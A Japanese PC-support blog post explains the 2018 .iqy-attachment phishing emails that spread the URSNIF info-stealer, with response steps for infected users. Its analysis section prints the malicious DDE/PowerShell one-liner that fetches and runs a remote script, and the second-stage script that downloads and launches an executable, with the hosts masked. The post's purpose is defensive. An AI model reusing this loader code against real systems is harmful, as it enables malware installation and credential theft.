ウイルス セキュリティ

iqyファイルがメールで送られてきた!ウイルス感染時の対処方法について

 

「写真送付」といったタイトルのメールを開き、「.iqy」という添付ファイルを開いても何も表示されない!これってウイルスメールなの!?大丈夫?
高確率でウイルスメールです。今すぐネットワークから隔絶し、ウイルス対策ソフトでウイルススキャンを実施してください!

 

2018/8/6あたりから問い合わせが殺到している「iqyファイル」を添付した標的型攻撃メール。

日本語を使った巧みすぎる手口に感染してしまう方が続出しているので、ある程度私が解析した結果を掲載します。

 

 

iqyファイルが添付されたメールの特徴

 

このメールには「iqy」という拡張子のファイルが添付されているのが最大の特徴。この時点で不審なファイルが添付されていると気づけた人は大勝利です。

 

しかしこのメール、日本語を巧みに使っており、ITリテラシーの低い方がウイルスメールと見抜くのは難しいです。

署名の社名等も見事に作られ、更にCCにまで架空の日本人の名前をアルファベットに直したメールアドレスを入れるという徹底ぶり。

メールのタイトルは主に「写真添付」「写真送付」「写真送付の件」等というものが多く、本文には「XLS版を送付します」といった内容が多いのではないでしょうか。

 

私もここまで日本語に特化したウイルスメールは初めて見ました…

 

感染するとどうなるのか

 

トレンドマイクロも既に把握しており、本件についての詳細を公開していますが、どうやら「URSNIF」といった情報搾取型のウイルスに感染させられてしまう模様です。

アカウント情報の抜き出しはもちろん、画面上のスクリーンショットを送信させられ続けてしまうという状況になるので極めて危険なウイルスと言って良いでしょう。ネットバンキングなんざイチコロです。

 

ちなみに感染の流れは以下のとおりです。

  1. iqyファイルが添付されたメールの「iqyファイル」を実行してしまう
  2. Excelが起動し「Microsoft Excel のセキュリティに関する通知」というウィンドウが表示される
  3. [有効にする]と[無効にする]と表示され[有効にする]をクリックすると感染してしまう

 

上記の3番で[無効にする]を選んだ方はセーフです。このメールを完全に削除しましょう。

しかし、[有効にする]を選んでしまった方はアウトです!

こうなってしまったら即座にLANケーブルを引っこ抜いたり、ワイヤレスネットワークの無効化を実施してネットワークから隔絶します。

また、必ずウイルススキャンしましょう。

 

ちょっと解析してみた

 

私もiqyファイルを入手したので、ちょっとだけ解析してみました。一応載せておきますね。

 

添付されているiqyファイルを起動するとExcelが起動します。
そして[http://●●●/×××]のhtml内に記述されている以下のPowerShellのコマンドを実行します。

PowerShellコマンド
=CmD|' / PoWerSHeLL -NoloGO -EXecUtIONPO ByPass -WInDOw hiDdEN -nOPrOfIL -NoniNTER IEX ((new-object net.webclient).downloadstring(\"http://●●●/×××/▲▲▲.dat\"))'!A0

 

このPowerShellでは結果的に[http://●●●/×××/▲▲▲.dat]からダウンロードしてきたdatファイルの実行を試みます。
datファイルのソースは次の通りとなっていました。

 

▲▲▲.dat

$jsonip = Invoke-WebRequest http://ipinfo.io/json;
Convertfrom-JSON $jsonip.Content;
if($ipinfo.country -Match "JP"){
$urls="http://●●●/×××/□□.xlsx","";
foreach($url in $urls){
Try{
write-Host $url;
$fp = "$env:temp\undocument.exe";
Write-Host $fp;
$wc = New-Object System.Net.WebClient;
$wc.DownloadFile($url, $fp);
Start-Process $fp;
break
}
Catch{
Write-Host $_.Exception.Message
}
}
}

 

このdatファイルのソースを確認すると[http://●●●/×××/□□.xlsx]というファイルをダウンロードして開き、処理を進めようとしていることがわかります。

 

さて、残念ながら解析はここでおしまいです。ポリシー上これ以上解析はできませんでした…

しかし、ここまででも割と十分です。このあとにウイルスを引っ張ってくる処理が実行されるわけでしょうから。

 

途中でhttpから始まるURLがちょこちょこ出ていましたが、インストールされているウイルス対策ソフトがこのサイトをブロックしてくれていれば大事には至りません。

今回相談を受けた環境はウイルスバスターをインストールしており、Webレピュテーション機能が有効化されていたのです。

トレンドマイクロのSite Safety Centerで正常性を確認したところ、やはりそのURLは既に危険判定されていました。

ウイルスバスターを導入している端末であれば初めにPowerShellコマンドを実行された時点でアクセスが遮断されるため、この時点で自動的に処理が止まるのではないかと思われます。

このため、Webレピュテーション機能を具備しているウイルスバスターをインストールしていた場合、実行してしまったとしても問題ないものと推察されます。

とはいえ、必ず一度はPCをフルスキャンしておきましょうね!

 

こんな狡猾なウイルスメールが横行して猛威を振るう日が来てしまうとは…怖いですねぇ(主にユーザー対応が…)

-ウイルス, セキュリティ
-,

© 2024 PCトラブルサポートセンター